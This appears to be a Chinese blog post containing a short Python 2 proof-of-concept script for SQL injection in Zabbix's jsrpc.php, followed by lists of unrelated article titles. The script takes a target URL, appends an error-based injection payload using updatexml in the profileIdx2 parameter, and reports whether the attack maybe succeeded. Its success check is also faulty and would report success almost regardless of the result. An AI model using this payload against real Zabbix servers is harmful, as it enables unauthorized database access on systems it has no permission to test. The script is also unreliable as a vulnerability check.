zabbix(sql注入判断脚本)

#-*-coding:utf-8-*-

# code by anyun.org

import urllib

import re

def getHtml(url):

    page = urllib.urlopen(url)

    html = page.read()

    html = html.replace('\n', '')

    html = html.replace('       ', ' ')

    html = html.replace('   ', '')

    html = html.replace('   ', '')

    return html

url =raw_input('enter url:')

poc='jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&\

pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23\

&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'

new_url=url+poc

try:

	if getHtml(new_url).find('flickerfreescreen')<>0:

		print 'maybe successeed'

	else:

		print 'maybe unsuccessed'

except:

	print 'http error?'

  

最新文章

  1. linux下使用denyhosts防止ssh暴力破解
  2. [Recommendation System] 推荐系统之协同过滤(CF)算法详解和实现
  3. 用IIS配置反向代理
  4. 正则的小效果:-------&gt; 过滤敏感词
  5. cache写策略
  6. Uva 10007 / HDU 1131 - Count the Trees (卡特兰数)
  7. C# web 网页刷新时数据集的保存和应用
  8. selenium webdriver(4)---模拟鼠标键盘操作
  9. 如何在windows/wamp环境下在本机配置站点
  10. [Android算法] bitmap 将图片压缩到指定的大小
  11. 使apache解析域名到目录的方法
  12. hdu1878判断欧拉回路
  13. &lt;&lt;精通iOS开发&gt;&gt;第14章例子代码彻底清除警告
  14. video自定义
  15. c++入门之——const在函数名前面和函数后面的区别
  16. 在 ubuntu 中安装 python3.5、 tornado、 pymysql
  17. 浅谈 .NET 中的对象引用、非托管指针和托管指针 理解C#中的闭包
  18. C++飞机大战
  19. CefSharp F12打开DevTools查看console
  20. JAVA Drp项目实战—— Unable to compile class for JSP 一波三折

热门文章

  1. EL表达式概述
  2. IOS 友盟使用详解
  3. Reveal使用步骤和 破解Revealapp的试用时间限制
  4. win8下出现安装sql2012 正在启动操作系统功能"NetFx3"
  5. FLUSH TABLES WITH READ LOCK
  6. git 一般的开发流程中的代码管理
  7. Html5如何使我们开发出来的应用或页面大小能适合各种高端手机使用
  8. android中TimePicker和DatePicker的简单使用
  9. 第六篇 :微信公众平台开发实战Java版之如何自定义微信公众号菜单
  10. Error: Could not access the Package Manager. Is the system running?